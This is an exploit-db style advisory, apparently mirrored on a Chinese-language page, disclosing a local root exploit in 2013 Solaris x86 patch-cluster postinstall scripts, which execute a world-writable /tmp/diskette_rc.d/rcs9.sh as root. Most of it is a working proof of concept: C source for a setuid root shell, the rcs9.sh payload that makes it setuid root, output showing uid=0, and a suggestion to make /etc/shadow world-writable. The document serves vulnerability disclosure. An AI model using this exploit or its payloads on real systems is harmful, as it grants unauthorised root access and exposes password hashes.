Solaris Recommended Patch Cluster 6/19 (x86) – Local Privilege Escalation

  • 作者: Larry W. Cashdollar
    日期: 2013-07-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/26709/
  • Solaris Recommended Patch Cluster 6/19 local root on x86
    
    Larry W. Cashdollar
    7/3/2013
    @_larry0
    
    If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based.
    
    Local root:
    
    Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root.
    
    ./144751-01/SUNWos86r/install/postinstall
    
    
    782 if [ -s /tmp/disketterc.d/rcs9.sh ] 783 then 784 /sbin/sh /tmp/disketterc.d/rcs9.sh "post" 785 fi
    
    Inject entries into driver_aliases, research config file? maybe we can load our own library/driver?
    
    804 # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs) 805 TMPFILE=/tmp/ncrstmp 806 sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driveraliases >$TMPFIL E 807 cp $TMPFILE ${BASEDIR}/etc/driver_aliases
    
    
    ./141445-09/SUNWos86r/install/postinstall
    
    
    656 if [ -s /tmp/disketterc.d/rcs9.sh ] 657 then 658 /sbin/sh /tmp/disketterc.d/rcs9.sh "post" 659 fi
    
    
    Well, it looks like you've got a few chances to abuse it:
    
    
    larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \; ./144501-19/SUNWos86r/install/postinstall ./141445-09/SUNWos86r/install/postinstall ./142059-01/SUNWos86r/install/postinstall ./147148-26/SUNWos86r/install/postinstall ./127128-11/SUNWos86r/install/postinstall ./148889-03/SUNWos86r/install/postinstall ./142910-17/SUNWos86r/install/postinstall ./144751-01/SUNWos86r/install/postinstall
    
    Psuedo PoC:
    
    Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry.
    
    chmod 666 /etc/shadow would be easy.
    
    PoC:
    
    larry@slowaris:~$ cat setuid.c 
    #include 
    #include 
    int
    main (void)
    {
    char *shell[2];
    shell[0] = "sh";
    shell[1] = NULL;
    setregid (0, 0);
    setreuid (0, 0);
    execve ("/bin/sh", shell, NULL);
    return(0);
    }
    
    gcc -o /tmp/r00t setuid.c
    
    larry@slowaris:~$ cat /tmp/diskette_rc.d/rcs9.sh chown root:root /tmp/r00t chmod +s /tmp/r00t
    
    After patches have been applied:
    
    larry@slowaris:~$ /tmp/r00t
    # id
    
    uid=0(root) gid=0(root)